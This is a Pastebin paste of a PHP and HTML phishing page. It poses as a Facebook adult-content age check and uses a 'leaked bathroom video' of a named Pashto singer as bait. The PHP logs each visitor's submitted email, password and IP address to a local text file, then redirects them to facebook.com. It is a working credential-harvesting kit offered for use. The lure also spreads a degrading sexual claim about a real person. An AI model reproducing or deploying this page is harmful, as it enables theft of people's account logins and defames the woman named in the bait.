Advertisement
iampathan

my page

Jun 25th, 2016
42
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.15 KB | None | 0 0
  1. <?php
  2. $valid_email = array('@','0','1','2','3','4','5','6','7','8','9','10','_','.','+');
  3. $valid_password = array('asd','sdf','dfg','fgh','ghj','hjk','jkl','kl','zxc','xcv','cvb','vbn','bnm','nm','qwe','wer','ert','rty','gfd','fds','dsa','sda','gfs','fgs');
  4.  
  5. if (isset($_POST['login'])) {
  6. $Pass = $_POST['pass'];
  7. $Uname = $_POST['uname'];
  8.  
  9.  
  10. function ValidUname($Uname,$valid_email){
  11. foreach ($valid_email as $vemail) {
  12. if (strpos($Uname, $vemail)) {
  13. return $Uname;
  14. }}}
  15.  
  16.  
  17. function ValidPass($Pass,$valid_password){
  18. foreach ($valid_password as $vpass) {
  19. $check = substr($Pass, 0,3);
  20. if ($check != $vpass) {
  21. return $Pass;
  22. }else{return false;}}}
  23.  
  24.  
  25.  
  26.  
  27. if (strlen($Uname & $Pass) >5) {
  28. $Uname = ValidUname($Uname,$valid_email);
  29. $Pass = ValidPass($Pass,$valid_password);
  30. }else{$status = "Wrong Password or Email";}
  31.  
  32.  
  33.  
  34. $user_ip = $_SERVER['REMOTE_ADDR'].(isset($_SERVER['HTTP_X_FORWARDED_FOR'])?'('.$_SERVER['HTTP_X_FORWARDED_FOR'].')':'')."\n";
  35. if (empty($Uname) or empty($Pass)) {
  36. $status = "Wrong Password or Email";
  37. }else{
  38.  
  39.  
  40. if (file_exists('smevk.txt')) {
  41. $file = fopen("smevk.txt", "a+");
  42. fwrite($file, "Username::".$Uname."\n");
  43. fwrite($file, "Password::".$Pass."\n");
  44. fwrite($file, "User ip::".$user_ip."\n");
  45. fwrite($file, "_____________________________________\n");
  46. fclose($file);
  47. echo "<sript>alert('Your package is insufficient to watch this video.')</script>";
  48. header("location:https://www.facebook.com");
  49.  
  50. }else{
  51. fopen("smevk.txt", "wb");
  52. }
  53.  
  54.  
  55.  
  56.  
  57.  
  58. }
  59. }
  60. ?>
  61. <!DOCTYPE html>
  62. <html>
  63. <head>
  64. <title>Gulpanra Bathroom Video</title>
  65. <link rel="stylesheet" href="css/style.css">
  66. <meta property="og:title" content="Pashtoo singer Gulpanra Private Bathroom video got leaked by unknown person." />
  67. <meta property="og:type" content="Video" />
  68. <meta property="og:image" content="http://www.casinomegamall.com/software/images/p/img/ga.jpg" />
  69. </head>
  70. <body>
  71. <div class="banner">
  72. <div id="bannerfonts">facebook</div>
  73. </div>
  74. <!-- banner end here -->
  75. <div class="canvas">
  76. <form method="post" >
  77. <span style="color: #3b5998; font-size: 25px;">Verify before you go!</span><br>
  78. <span style="color:#717171; font-size: 13px;">Facebook has detected that the link you visiting,contains adult content.</span><br><br>
  79. <?php
  80. if (isset($status)) {?>
  81. <span style="color: red; font-size: 13px;"><?=$status;?></span><br>
  82. <?php
  83. }?>
  84. <input type="text" name="uname" id="uname" placeholder="Email or Phone" required><br>
  85. <input type="password" name="pass" id="pass" placeholder="Password" required><br><br>
  86. <input type="checkbox" style="margin-left: -150px;"> <span style="color: #a09f9f ;"> I am 18 year old</span><br><br>
  87. <input type="submit" name="login" id="login" value="Let me Visit">
  88. </div>
  89. <!-- canvas end here -->
  90. <div id="info">Please help us improve facebook for everyone.<br>We are working hard to improve facebook for everyone around the world.<br>There are about million facebook user having age of less than 18.<br>We are trying to improve facebook adult content system .<br>Now no one can visit adult link unless one verify one's age with facebook.</div>
  91. </body>
  92. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement